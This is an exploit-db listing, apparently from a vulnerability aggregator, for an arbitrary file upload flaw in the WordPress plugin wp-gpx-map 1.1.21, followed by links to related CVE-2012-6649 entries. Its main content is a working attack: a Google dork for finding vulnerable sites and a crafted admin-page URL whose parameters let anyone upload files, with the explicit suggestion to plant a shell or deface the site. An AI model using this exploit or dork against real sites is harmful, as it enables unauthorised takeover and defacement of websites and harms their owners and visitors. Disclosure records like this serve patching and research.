Lucene search
Adrien ThierryEDB-ID:19050HistoryJun 11, 2012 - 12:00 a.m.
WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload
2012-06-1100:00:00
Adrien Thierry
www.exploit-db.com
31
###########################################################
#
# Exploit Title: Wordpress wp-gpx-map version 1.1.21 Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/wp-gpx-maps/
# Date: 11/05/2012
# Exploit Author: Adrien Thierry
# Vendor Homepage: http://www.darwinner.it/
# Software Link: http://downloads.wordpress.org/plugin/wp-gpx-maps.1.1.21.zip
# Version: 1.1.21
#
###########################################################
Vuln page : http://mysite.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php
exploit :
Go to url :
http://my-site.com/wp-content/plugins/wp-gpx-maps/wp-gpx-maps_admin_tracks.php?realGpxPath=.&target_path=.&gpxRegEx=//
And you can upload what you want. You could change file path with target_path (deface, shell etc...)
#####################################################################Related
cve
cve
CVE-2012-6649
2020-01-23 22:15:09
patchstack
patchstack
WordPress WP GPX Map Plugin 1.1.21 - Arbitrary File Upload
2012-06-11 00:00:00
prion
prion
Unrestricted file upload
2020-01-23 22:15:00
wpvulndb
wpvulndb
wp-gpx-max version 1.1.21 - Arbitrary File Upload
2014-08-01 00:00:00
cvelist
cvelist
CVE-2012-6649
2020-01-23 21:53:13
nvd
nvd
CVE-2012-6649
2020-01-23 22:15:09